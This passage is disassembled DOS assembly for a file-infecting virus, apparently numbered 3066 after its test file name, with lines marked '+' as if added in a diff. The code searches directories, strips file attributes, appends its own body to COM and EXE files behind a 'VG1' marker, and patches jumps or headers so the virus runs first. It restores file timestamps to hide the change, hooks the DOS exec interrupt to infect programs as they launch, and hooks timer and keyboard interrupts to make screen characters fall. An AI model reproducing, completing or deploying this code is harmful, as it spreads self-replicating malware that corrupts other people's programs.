ds:data_24e[si],0 ; (0000:0155=0EAh) + jne loc_25 ; Jump if not equal + mov ah,4Fh ; 'O' + jmp short loc_22 ; (03BA) +loc_25: ; xref 6FB8:03A3, 03C0, 03E5 + call sub_2 ; (0444) + mov dx,si + add dx,data_13e ; (0000:00B3=1) + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx +loc_26: ; xref 6FB8:0424 + mov ah,4Fh ; 'O' + mov cx,10h + cmp byte ptr ds:data_16e[si],0 ; (0000:00DF=1) + jne loc_27 ; Jump if not equal + mov byte ptr ds:data_16e[si],1 ; (0000:00DF=1) + mov word ptr [si+5],2E2Ah + mov word ptr [si+7],2Ah + mov ah,4Eh ; 'N' + mov dx,si + add dx,5 +loc_27: ; xref 6FB8:0402 + call sub_1 ; (0436) + jc loc_29 ; Jump if carry Set + test byte ptr ds:data_14e[si],10h ; (0000:00C8=0DAh) + jz loc_26 ; Jump if zero + mov dx,si + add dx,data_15e ; (0000:00D1=10h) + mov ah,3Bh ; ';' + call sub_1 ; (0436) + jc loc_29 ; Jump if carry Set + jmp loc_17 ; (0359) + +3066 endp + +; +; SUBROUTINE +; +; Called from: 6FB8:02E7, 02F7, 037C, 03BD, 041A, 042E, 0450 +; 0571, 0582, 058A +; + +sub_1 proc near + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + jc loc_ret_28 ; Jump if carry Set + test byte ptr cs:data_47e[si],0FFh ; (6FB8:00EE=0) + jz loc_ret_28 ; Jump if zero + stc ; Set carry flag + +loc_ret_28: ; xref 6FB8:0438, 0440 + retn +sub_1 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:0351, 03EB, 0454 +; + +sub_2 proc near + mov word ptr [si+5],5Ch + mov dx,si + add dx,5 + mov ah,3Bh ; ';' + call sub_1 ; (0436) + retn +sub_2 endp + +loc_29: ; xref 6FB8:0394, 03D5, 041D, 0431 + call sub_2 ; (0444) + mov dx,si + add dx,46h + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx +loc_30: ; xref 6FB8:02C8, 033C + mov bx,ds:data_48e[si] ; (6FB8:00EF=0) + or bx,bx ; Zero ? 
+ jz loc_32 ; Jump if zero + mov cx,ds:data_51e[si] ; (6FB8:00F5=0) + mov dx,data_56[si] ; (6FB8:0151=4D10h) + mov ds,data_57[si] ; (6FB8:0153=6FB8h) + cmp cx,20h + je loc_31 ; Jump if equal + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx +loc_31: ; xref 6FB8:0477 + push cs + pop ds + mov cx,ds:data_49e[si] ; (6FB8:00F1=0) + mov dx,ds:data_50e[si] ; (6FB8:00F3=0) + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_32: ; xref 6FB8:0466 + mov dl,ds:data_41e[si] ; (6FB8:00E3=0) + mov ah,0Eh + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) + call sub_16 ; (089A) + pop ax + mov ds:data_39e[si],ax ; (6FB8:00E0=0) + cmp byte ptr [si+3],0FFh + je loc_33 ; Jump if equal + add ax,10h + add [si+2],ax + pop ax + pop ds +;* jmp dword ptr cs:[si] ;*1 entry + db 0FFh, 2Ch +loc_33: ; xref 6FB8:04A5 + call sub_10 ; (076E) + push cs + pop ds + mov ax,[si] + mov word ptr ds:[100h],ax ; (6FB8:0100=40E9h) + mov al,[si+2] + mov byte ptr ds:[102h],al ; (6FB8:0102=1) + jz loc_34 ; Jump if zero + mov bx,ds + add bx,1D0h + mov es,bx + mov di,si + mov dx,si + mov cx,0BFAh + call sub_20 ; (0D32) + mov cx,dx + mov si,dx + dec si + mov di,si + std ; Set direction flag + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + push ds + pop es + mov di,data_93e ; (7188:0100=0) + mov ds,bx + mov si,dx + mov cx,0BFAh + call sub_20 ; (0D32) + mov si,100h + push cs + pop ds + call sub_13 ; (07CD) + mov dx,1D0h +loc_34: ; xref 6FB8:04C2 + mov di,cs + add di,dx + mov word ptr [si+5],100h + mov [si+7],di + pop ax + pop ds + mov ds,di + mov es,di + mov ss,di + xor bx,bx ; Zero register + xor cx,cx ; Zero register + xor bp,bp ; Zero register +;* jmp dword ptr cs:[si+5] ;*1 entry + db 0FFh, 6Ch, 05h +loc_35: ; xref 6FB8:0574, 0585, 058D + mov byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) + retn + +; +; SUBROUTINE +; +; 
Called from: 6FB8:0339, 0391, 03D2 +; + +sub_3 proc near + mov bx,ds:data_48e[si] ; (6FB8:00EF=0) + or bx,bx ; Zero ? + jz loc_ret_36 ; Jump if zero + mov dx,si + add dx,data_34e ; (6FB8:0004=0) + nop ;*ASM fixup - sign extn byte + mov cx,1 + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + +loc_ret_36: ; xref 6FB8:0525 + retn +sub_3 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:038C, 03CD +; + +sub_4 proc near + push dx + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + add al,41h ; 'A' + mov ah,3Ah ; ':' + mov word ptr ds:[884h][si],ax ; (6FB8:0884=8489h) + mov byte ptr ds:[886h][si],5Ch ; (6FB8:0886=0EAh) '\' + push si + add si,offset ds:[887h] ; (6FB8:0887=0) + mov ah,47h ; 'G' + mov di,si + xor dl,dl ; Zero register + int 21h ; DOS Services ah=function 47h + ; get present dir,drive dl,1=a: + pop si + dec di +loc_37: ; xref 6FB8:055B + inc di + mov al,[di] + or al,al ; Zero ? + jnz loc_37 ; Jump if not zero + pop bx + mov byte ptr [di],5Ch ; '\' + inc di + mov dx,bx +loc_38: ; xref 6FB8:056C + mov al,[bx] + mov [di],al + inc bx + inc di + or al,al ; Zero ? 
+ jnz loc_38 ; Jump if not zero + +; External Entry into Subroutine +; +; Called from: 6FB8:097E + +sub_5: + mov ax,4300h + call sub_1 ; (0436) + jc loc_35 ; Jump if carry Set + mov cs:data_42e[si],cx ; (6FB8:00E4=0) + and cx,0FEh + mov ax,4301h + call sub_1 ; (0436) + jc loc_35 ; Jump if carry Set + mov ax,3D02h + call sub_1 ; (0436) + jc loc_35 ; Jump if carry Set + mov bx,ax + push ds + push dx + call sub_6 ; (05BD) + pop dx + pop ds + pushf ; Push flags + mov cx,cs:data_42e[si] ; (6FB8:00E4=0) + cmp cx,20h + je loc_39 ; Jump if equal + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx +loc_39: ; xref 6FB8:05A1 + mov cx,cs:data_43e[si] ; (6FB8:00E6=0) + mov dx,cs:data_44e[si] ; (6FB8:00E8=0) + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + popf ; Pop flags + retn +sub_4 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:0593 +; + +sub_6 proc near + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + push cs + pop ds + mov ds:data_43e[si],cx ; (6FB8:00E6=0) + mov ds:data_44e[si],dx ; (6FB8:00E8=0) + mov dx,si + add dx,0Dh + mov di,dx + mov ah,3Fh ; '?' + mov cx,1Ch + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + cmp word ptr [di],5A4Dh + je loc_42 ; Jump if equal + call sub_9 ; (0764) + add ax,0CF5h + jc loc_ret_40 ; Jump if carry Set + cmp byte ptr [di],0E9h + jne loc_41 ; Jump if not equal + mov dx,[di+1] + xor cx,cx ; Zero register + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,di + add dx,1Ch + mov ah,3Fh ; '?' 
+ mov cx,3 + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + call sub_7 ; (06AB) + jnc loc_41 ; Jump if carry=0 + mov cs:data_58[si],1 ; (6FB8:0155=0) + +loc_ret_40: ; xref 6FB8:05E6 + retn +loc_41: ; xref 6FB8:05EB, 0606 + call sub_9 ; (0764) + mov word ptr ds:[880h][si],ax ; (6FB8:0880=687h) + mov word ptr ds:[882h][si],dx ; (6FB8:0882=90h) + push ax + mov word ptr [di+3],0FFFFh + mov cx,5 + mov ah,40h ; '@' + mov dx,di + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov dx,si + add dx,5 + mov cx,0BF5h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov byte ptr [di],0E9h + pop ax + add ax,0F7h + mov [di+1],ax + mov dx,di + mov cx,3 + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + clc ; Clear carry flag + retn +loc_42: ; xref 6FB8:05DE + cmp word ptr [di+0Ch],0FFFFh + jne loc_43 ; Jump if not equal + push si + mov si,[di+14h] + mov cx,[di+16h] + mov ax,cx + mov cl,ch + xor ch,ch ; Zero register + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shl ax,1 ; Shift w/zeros fill + shl ax,1 ; Shift w/zeros fill + shl ax,1 ; Shift w/zeros fill + shl ax,1 ; Shift w/zeros fill + add si,ax + adc cx,0 + sub si,3 + sbb cx,0 + mov ax,[di+8] + call sub_8 ; (0751) + add si,ax + adc cx,dx + mov dx,si + pop si + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,di + add dx,1Ch + mov ah,3Fh ; '?' 
+ mov cx,3 + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + call sub_7 ; (06AB) + jnc loc_46 ; Jump if carry=0 + mov cs:data_58[si],1 ; (6FB8:0155=0) + retn + +; External Entry into Subroutine +; +; Called from: 6FB8:0603, 069F + +sub_7: + cmp word ptr [di+1Ch],4756h + jne loc_45 ; Jump if not equal + cmp byte ptr [di+1Eh],31h ; '1' + jne loc_45 ; Jump if not equal +loc_43: ; xref 6FB8:0657 + stc ; Set carry flag + +loc_ret_44: ; xref 6FB8:06E0 + retn +loc_45: ; xref 6FB8:06B0, 06B6 + clc ; Clear carry flag + retn +loc_46: ; xref 6FB8:06A2 + call sub_9 ; (0764) + mov word ptr ds:[880h][si],ax ; (6FB8:0880=687h) + mov word ptr ds:[882h][si],dx ; (6FB8:0882=90h) + mov cx,[di+4] + shl cx,1 ; Shift w/zeros fill + xchg ch,cl + mov bp,cx + and bp,0FF00h + xor ch,ch ; Zero register + add bp,[di+6] + adc cx,0 + sub bp,ax + sbb cx,dx + jc loc_ret_44 ; Jump if carry Set + push ax + push dx + push word ptr [di+18h] + mov byte ptr [di+18h],0FFh + mov cx,5 + mov ah,40h ; '@' + mov dx,di + add dx,14h + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + pop word ptr [di+18h] + mov dx,si + add dx,5 + mov cx,0BF5h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + pop word ptr [di+16h] + pop word ptr [di+14h] + add word ptr [di+14h],0FAh + adc word ptr [di+16h],0 + mov ax,[di+8] + call sub_8 ; (0751) + sub [di+14h],ax + sbb [di+16h],dx + mov cl,0Ch + shl word ptr [di+16h],cl ; Shift w/zeros fill + mov ax,0BFAh + add ax,[di+2] + mov [di+2],ax + and word ptr [di+2],1FFh + mov al,ah + xor ah,ah ; Zero register + shr ax,1 ; Shift w/zeros fill + add [di+4],ax + mov dx,di + mov cx,1Ch + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + clc ; Clear carry flag + retn +sub_6 endp + + +; +; SUBROUTINE +; +; 
Called from: 6FB8:0684, 0721 +; + +sub_8 proc near + xor dx,dx ; Zero register + shl ax,1 ; Shift w/zeros fill + rcl dx,1 ; Rotate thru carry + shl ax,1 ; Shift w/zeros fill + rcl dx,1 ; Rotate thru carry + shl ax,1 ; Shift w/zeros fill + rcl dx,1 ; Rotate thru carry + shl ax,1 ; Shift w/zeros fill + rcl dx,1 ; Rotate thru carry + retn +sub_8 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:05E0, 060F, 06BC +; + +sub_9 proc near + xor dx,dx ; Zero register + xor cx,cx ; Zero register + mov ax,4202h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + retn +sub_9 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:0263, 04B2 +; + +sub_10 proc near + xor ax,ax ; Zero register + mov ds,ax + lds di,dword ptr ds:data_11e ; (0000:009C=10BCh) Load 32 bit ptr + lds di,dword ptr [di+1] ; Load 32 bit ptr + mov ax,di + sub di,75Fh + call sub_11 ; (07AB) + jz loc_ret_47 ; Jump if zero + mov di,ax + sub di,755h + call sub_11 ; (07AB) + jz loc_ret_47 ; Jump if zero + lds di,dword ptr ds:data_27e ; (00AE:0080=4EFFh) Load 32 bit ptr + lds di,dword ptr [di+1] ; Load 32 bit ptr + mov ax,di + sub di,676h + call sub_11 ; (07AB) + jz loc_ret_47 ; Jump if zero + mov di,ax + sub di,673h + call sub_11 ; (07AB) + +loc_ret_47: ; xref 6FB8:0782, 078D, 079F + retn +sub_10 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:077F, 078A, 079C, 07A7 +; + +sub_11 proc near + xor dx,dx ; Zero register + cmp word ptr [di],4756h + jne loc_48 ; Jump if not equal + cmp byte ptr [di+2],31h ; '1' + je loc_49 ; Jump if equal +loc_48: ; xref 6FB8:07B1 + inc dx +loc_49: ; xref 6FB8:07B7 + sub di,0F7h + or dx,dx ; Zero ? 
+ retn +sub_11 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:07DE, 07E4, 07EA, 07F0, 0864, 086A, 0870 +; + +sub_12 proc near + mov al,0EAh + stosb ; Store al to es:[di] + mov ax,cx + add ax,si + stosw ; Store ax to es:[di] + mov ax,cs + stosw ; Store ax to es:[di] + +loc_ret_50: ; xref 6FB8:07CF + retn +sub_12 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:04F4 +; + +sub_13 proc near + or dx,dx ; Zero ? + jz loc_ret_50 ; Jump if zero + push ds + push es + mov es,ds:data_39e[si] ; (6FB8:00E0=0) + mov di,data_46e ; (6FB8:00EC=0) + cld ; Clear direction + mov cx,9A8h + call sub_12 ; (07C1) + mov cx,76Ah + call sub_12 ; (07C1) + mov cx,7BEh + call sub_12 ; (07C1) + mov cx,84Ch + call sub_12 ; (07C1) + xor ax,ax ; Zero register + mov ds,ax + cli ; Disable interrupts + mov ax,0ECh + xchg ax,ds:data_3e ; (0000:0070=0FF53h) + mov word ptr cs:[0A88h][si],ax ; (6FB8:0A88=49A0h) + mov ax,es + xchg ax,ds:data_4e ; (0000:0072=0F000h) + mov word ptr cs:[0A8Ah][si],ax ; (6FB8:0A8A=0B904h) + mov ax,0F1h + xchg ax,ds:data_5e ; (0000:0080=1094h) + mov word ptr cs:[76Eh][si],ax ; (6FB8:076E=0C033h) + mov ax,es + xchg ax,ds:data_6e ; (0000:0082=123h) + mov word ptr cs:[770h][si],ax ; (6FB8:0770=0D88Eh) + mov ax,0F6h + xchg ax,ds:data_7e ; (0000:0084=109Eh) + mov word ptr cs:[7DCh][si],ax ; (6FB8:07DC=9A8h) + mov ax,es + xchg ax,ds:data_8e ; (0000:0086=123h) + mov word ptr cs:[7DEh][si],ax ; (6FB8:07DE=0E0E8h) + mov ax,0FBh + xchg ax,ds:data_11e ; (0000:009C=10BCh) + mov word ptr cs:[857h][si],ax ; (6FB8:0857=6C3h) + mov ax,es + xchg ax,word ptr ds:data_11e+2 ; (0000:009E=123h) + mov word ptr cs:[859h][si],ax ; (6FB8:0859=848Eh) + pop es + pop ds + sti ; Enable interrupts + retn +sub_13 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:08F2 +; + +sub_14 proc near + push es + mov es,word ptr ds:[0E0h][si] ; (0000:00E0=10DAh) + mov di,data_21e ; (0000:00F1=10h) + cld ; Clear direction + mov cx,76Dh + call sub_12 ; (07C1) + mov cx,7E0h + call sub_12 ; (07C1) + mov cx,856h + call 
sub_12 ; (07C1) + pop es + retn +sub_14 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:024A, 0938 +; + +sub_15 proc near + push es + xor ax,ax ; Zero register + mov es,ax + mov ax,85Bh + add ax,si + xchg ax,es:data_9e ; (0000:0090=156h) + mov ds:data_18e[si],ax ; (0000:00EA=123h) + mov ax,cs + xchg ax,es:data_10e ; (0000:0092=44Bh) + mov ds:data_19e[si],ax ; (0000:00EC=10DAh) + pop es + mov byte ptr ds:data_20e[si],0 ; (0000:00EE=23h) + retn +sub_15 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:0499, 0981 +; + +sub_16 proc near + push es + xor ax,ax ; Zero register + mov es,ax + mov ax,cs:data_45e[si] ; (6FB8:00EA=0) + mov es:data_9e,ax ; (0000:0090=156h) + mov ax,cs:data_46e[si] ; (6FB8:00EC=0) + mov es:data_10e,ax ; (0000:0092=44Bh) + pop es + retn +sub_16 endp + + jmp short loc_53 ; (08EA) + nop +;* jmp far ptr loc_2 ;*(029B:136C) + db 0EAh, 6Ch, 13h, 9Bh, 02h + +; +; SUBROUTINE +; +; Called from: 6FB8:0247, 08CB, 08EC, 0935 +; + +sub_17 proc near + pop bx + push ds + push ax + push ds + push cs + pop ds + call sub_18 ; (08C4) + +; External Entry into Subroutine +; +; Called from: 6FB8:08C1 + +sub_18: + pop si + sub si,77Bh + jmp bx ;*Register jump +loc_51: ; xref 6FB8:0918, 091D + call sub_17 ; (08BB) + push cx + mov ax,[si+7] + mov cx,es + cmp ax,cx + pop cx + pop ds + pop ax + jnz loc_52 ; Jump if not zero + push cs + pop es + cmp ah,49h ; 'I' + je loc_52 ; Jump if equal + add bx,1D0h +loc_52: ; xref 6FB8:08D9, 08E0 + pop ds + jmp short loc_55 ; (0924) + db 90h +loc_53: ; xref 6FB8:08B3, 090A, 0913 + xor dx,dx ; Zero register +loc_54: ; xref 6FB8:090F + call sub_17 ; (08BB) + push es + push dx + cli ; Disable interrupts + call sub_14 ; (0858) + sti ; Enable interrupts + pop ax + mov dx,1D0h + add dx,ax + add dx,10h + pop es + pop ds + pop ax + pop ds + mov ah,31h ; '1' + jmp short loc_55 ; (0924) + cmp ah,4Ch ; 'L' + je loc_53 ; Jump if equal + cmp ah,31h ; '1' + je loc_54 ; Jump if equal + or ah,ah ; Zero ? 
+ jz loc_53 ; Jump if zero + cmp ah,49h ; 'I' + je loc_51 ; Jump if equal + cmp ah,4Ah ; 'J' + je loc_51 ; Jump if equal + cmp ah,4Bh ; 'K' + je loc_56 ; Jump if equal +loc_55: ; xref 6FB8:08E7, 0905, 0993 +;* jmp far ptr loc_4 ;*(0E4C:035D) + db 0EAh, 5Dh, 03h, 4Ch, 0Eh + db 80h,0FCh, 4Bh, 75h,0F6h +loc_56: ; xref 6FB8:0922 + push cx + push dx + push es + push bx + push si + push di + push bp + call sub_17 ; (08BB) + call sub_15 ; (0875) +loc_57: ; xref 6FB8:0941, 0949 + sti ; Enable interrupts + test byte ptr ds:data_26e,2 ; (0000:0972=74h) + jnz loc_57 ; Jump if not zero + cli ; Disable interrupts + test byte ptr ds:data_26e,2 ; (0000:0972=74h) + jnz loc_57 ; Jump if not zero + or byte ptr ds:data_26e,2 ; (0000:0972=74h) + pop ds + mov bx,dx + mov byte ptr cs:data_40e[si],0FFh ; (6FB8:00E2=0) + cmp byte ptr [bx+1],3Ah ; ':' + jne loc_58 ; Jump if not equal + mov al,[bx] + or al,20h ; ' ' + sub al,61h ; 'a' + mov cs:data_40e[si],al ; (6FB8:00E2=0) +loc_58: ; xref 6FB8:095D + push si + push di + push es + cld ; Clear direction + mov si,dx + push cs + pop es + mov di,offset ds:[984h] ; (6FB8:0984=2Eh) +loc_59: ; xref 6FB8:0979 + lodsb ; String [si] to al + stosb ; Store al to es:[di] + or al,al ; Zero ? 
+ jnz loc_59 ; Jump if not zero + pop es + pop di + pop si + call sub_5 ; (056E) + call sub_16 ; (089A) + and byte ptr cs:[972h],0FDh ; (6FB8:0972=0BFh) + pop ax + pop ds + pop bp + pop di + pop si + pop bx + pop es + pop dx + pop cx + jmp short loc_55 ; (0924) +sub_17 endp + + db 83h,0C2h, 0Fh,0B1h, 04h,0D3h + db 0EAh,0E9h, 4Dh,0FFh,0EAh,0FEh + db 5Dh, 9Bh, 02h, 56h,0E8h, 00h + db 00h, 5Eh, 81h,0EEh, 5Fh, 08h + db 2Eh, 80h, 8Ch,0EEh, 00h, 01h + db 5Eh, 32h,0C0h,0CFh, 01h, 00h + db 00h, 00h, 8Ah, 00h, 00h, 00h + db 00h, 5Fh,0FEh, 00h, 00h, 00h + db 00h,0B8h, 00h, 00h, 49h, 00h + db 00h, 00h + db 'A:\TEST3066.COM' + + + db 00h, 00h, 00h, 45h, 58h, 45h + db 00h, 45h, 00h + db 143 dup (0) +loc_60: ; xref 6FB8:0AEF + push cx + push ds + push es + push si + push di + push cs + pop es + cld ; Clear direction + test al,20h ; ' ' + jz loc_63 ; Jump if zero + test al,2 + jnz loc_64 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + mov al,ds:data_25e ; (0000:0449=3) + mov cx,0B800h + cmp al,7 + jne loc_61 ; Jump if not equal + mov cx,0B000h + jmp short loc_62 ; (0A9F) +loc_61: ; xref 6FB8:0A90 + cmp al,2 + je loc_62 ; Jump if equal + cmp al,3 + jne loc_64 ; Jump if not equal +loc_62: ; xref 6FB8:0A95, 0A99 + mov word ptr cs:[97Ch],cx ; (6FB8:097C=5E5Fh) + or byte ptr cs:[972h],2 ; (6FB8:0972=0BFh) + mov word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) + mov ds,cx + mov cx,7D0h + xor si,si ; Zero register + mov di,offset ds:[0CF5h] ; (6FB8:0CF5=0BEh) + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + xor ax,ax ; Zero register + mov ds,ax + mov ax,0B92h + xchg ax,ds:data_1e ; (0000:0024=45h) + mov word ptr cs:[973h],ax ; (6FB8:0973=984h) + mov ax,cs + xchg ax,ds:data_2e ; (0000:0026=3D1h) + mov word ptr cs:[975h],ax ; (6FB8:0975=0AAACh) +loc_63: ; xref 6FB8:0A7E + mov cx,50h + mov ax,0F00h + mov di,offset data_54 ; (6FB8:0105=9) + rep stosw ; Rep when cx >0 Store ax to es:[di] + and byte ptr cs:[972h],7 ; (6FB8:0972=0BFh) +loc_64: ; xref 6FB8:0A82, 0A9D + pop di + pop si + 
pop es + pop ds + pop cx + jmp loc_76 ; (0BCF) +loc_65: ; xref 6FB8:0AFE + jmp short loc_60 ; (0A74) + push ax + mov byte ptr cs:[979h],0 ; (6FB8:0979=75h) + mov al,byte ptr cs:[972h] ; (6FB8:0972=0BFh) + test al,60h ; '`' + jnz loc_65 ; Jump if not zero + test al,80h + jz loc_68 ; Jump if zero + cmp word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) + je loc_66 ; Jump if equal + inc word ptr cs:[97Eh] ; (6FB8:097E=0EDE8h) + cmp word ptr cs:[97Eh],444h ; (6FB8:097E=0EDE8h) + jl loc_66 ; Jump if < + call sub_19 ; (0C25) + jmp loc_76 ; (0BCF) +loc_66: ; xref 6FB8:0B0A, 0B18 + test al,18h + jz loc_67 ; Jump if zero + dec word ptr cs:[977h] ; (6FB8:0977=0C00Ah) + jnz loc_67 ; Jump if not zero + and byte ptr cs:[972h],0E7h ; (6FB8:0972=0BFh) + or byte ptr cs:[972h],40h ; (6FB8:0972=0BFh) '@' + test al,8 + jz loc_67 ; Jump if zero + or byte ptr cs:[972h],20h ; (6FB8:0972=0BFh) ' ' +loc_67: ; xref 6FB8:0B22, 0B29, 0B39, 0B4C + jmp loc_76 ; (0BCF) +loc_68: ; xref 6FB8:0B02 + xor byte ptr cs:[972h],1 ; (6FB8:0972=0BFh) + test al,1 + jz loc_67 ; Jump if zero + push bx + push si + push ds + mov ds,word ptr cs:[97Ch] ; (6FB8:097C=5E5Fh) + xor si,si ; Zero register + mov byte ptr cs:[96Eh],0 ; (6FB8:096E=8Bh) +loc_69: ; xref 6FB8:0BB5 + mov bx,cs:data_54[si] ; (6FB8:0105=0CD09h) + or bx,bx ; Zero ? 
+ jz loc_70 ; Jump if zero + cmp byte ptr [bx+si],20h ; ' ' + jne loc_70 ; Jump if not equal + cmp byte ptr ds:data_31e[bx+si],20h ; (5E5F:FF60=0FFh) ' ' + je loc_70 ; Jump if equal + mov ax,720h + xchg ax,ds:data_31e[bx+si] ; (5E5F:FF60=0FFFFh) + mov [bx+si],ax + add bx,0A0h +loc_70: ; xref 6FB8:0B65, 0B6A, 0B71 + cmp bx,data_30e ; (5E5F:0FA0=0FFh) + je loc_71 ; Jump if equal + cmp byte ptr [bx+si],20h ; ' ' + jne loc_71 ; Jump if not equal + jnz loc_74 ; Jump if not zero +loc_71: ; xref 6FB8:0B84, 0B89 + mov bx,data_29e ; (5E5F:0F00=0FFh) +loc_72: ; xref 6FB8:0BA2 + cmp byte ptr [bx+si],20h ; ' ' + jne loc_73 ; Jump if not equal + cmp byte ptr ds:data_31e[bx+si],20h ; (5E5F:FF60=0FFh) ' ' + jne loc_74 ; Jump if not equal +loc_73: ; xref 6FB8:0B93 + sub bx,0A0h + or bx,bx ; Zero ? + jnz loc_72 ; Jump if not zero +loc_74: ; xref 6FB8:0B8B, 0B9A + mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) + or word ptr cs:[96Eh],bx ; (6FB8:096E=0F28Bh) + add si,2 + cmp si,0A0h + jne loc_69 ; Jump if not equal + cmp byte ptr cs:[96Eh],0 ; (6FB8:096E=8Bh) + jne loc_75 ; Jump if not equal + or byte ptr cs:[972h],80h ; (6FB8:0972=0BFh) + mov word ptr cs:[97Eh],1 ; (6FB8:097E=0EDE8h) +loc_75: ; xref 6FB8:0BBD + pop ds + pop si + pop bx +loc_76: ; xref 6FB8:0AEC, 0B1D, 0B41 + pop ax +;* jmp far ptr loc_90 ;*(FC00:3F4D) + db 0EAh, 4Dh, 3Fh, 00h,0FCh +loc_77: ; xref 6FB8:0C32 + mov al,20h ; ' ' + out 20h,al ; port 20h, 8259-1 int command + ; al = 20h, end of interrupt + pop ax + iret ; Interrupt return + db 50h,0E4h, 60h, 2Eh,0A2h, 7Ah + db 09h,0E4h, 61h, 8Ah,0E0h, 0Ch + db 80h,0E6h, 61h, 8Ah,0C4h,0E6h + db 61h, 2Eh, 80h, 3Eh, 79h, 09h + db 00h, 2Eh,0C6h, 06h, 79h, 09h + db 01h, 75h,0D9h, 2Eh,0A0h, 7Ah + db 09h, 3Ch,0F0h, 74h,0D1h, 24h + db 7Fh, 2Eh, 3Ah, 06h, 7Bh, 09h + db 2Eh,0A2h, 7Bh, 09h, 74h,0C4h + db 2Eh, 83h, 3Eh, 7Eh, 09h, 00h + db 74h, 07h, 2Eh,0C7h, 06h, 7Eh + db 09h, 01h, 00h,0E8h, 02h, 00h + db 0EBh,0B0h + +; +; SUBROUTINE +; +; Called from: 6FB8:0B1A +; + +sub_19 proc near + 
mov word ptr cs:[977h],28h ; (6FB8:0977=0C00Ah) + test byte ptr cs:[972h],80h ; (6FB8:0972=0BFh) + jz loc_77 ; Jump if zero + mov byte ptr cs:[970h],1 ; (6FB8:0970=0Eh) + push bx + push si + push ds + mov ds,word ptr cs:[97Ch] ; (6FB8:097C=5E5Fh) + test byte ptr cs:[972h],10h ; (6FB8:0972=0BFh) + jnz loc_81 ; Jump if not zero + or byte ptr cs:[972h],10h ; (6FB8:0972=0BFh) + xor si,si ; Zero register +loc_78: ; xref 6FB8:0C77 + mov bx,data_29e ; (5E5F:0F00=0FFh) +loc_79: ; xref 6FB8:0C5E + cmp byte ptr [bx+si],20h ; ' ' + je loc_80 ; Jump if equal + sub bx,0A0h + jnc loc_79 ; Jump if carry=0 + mov bx,0F00h +loc_80: ; xref 6FB8:0C58 + add bx,data_28e ; (5E5F:00A0=0FFh) + mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) + mov word ptr cs:[980h][si],bx ; (6FB8:0980=0E8FBh) + inc si + inc si + cmp si,data_37e ; (6FB8:00A0=0) + jne loc_78 ; Jump if not equal +loc_81: ; xref 6FB8:0C48 + xor si,si ; Zero register +loc_82: ; xref 6FB8:0CE4 + cmp cs:data_54[si],0FA0h ; (6FB8:0105=0CD09h) + je loc_88 ; Jump if equal + mov bx,word ptr cs:[980h][si] ; (6FB8:0980=0E8FBh) + mov ax,[bx+si] + cmp ax,word ptr cs:[0CF5h][bx+si] ; (6FB8:0CF5=0F5BEh) + jne loc_84 ; Jump if not equal + push bx +loc_83: ; xref 6FB8:0CA0, 0CA4 + or bx,bx ; Zero ? + jz loc_86 ; Jump if zero + sub bx,0A0h + cmp ax,word ptr cs:[0CF5h][bx+si] ; (6FB8:0CF5=0F5BEh) + jne loc_83 ; Jump if not equal + cmp ax,[bx+si] + je loc_83 ; Jump if equal + pop bx +loc_84: ; xref 6FB8:0C90 + or bx,bx ; Zero ? 
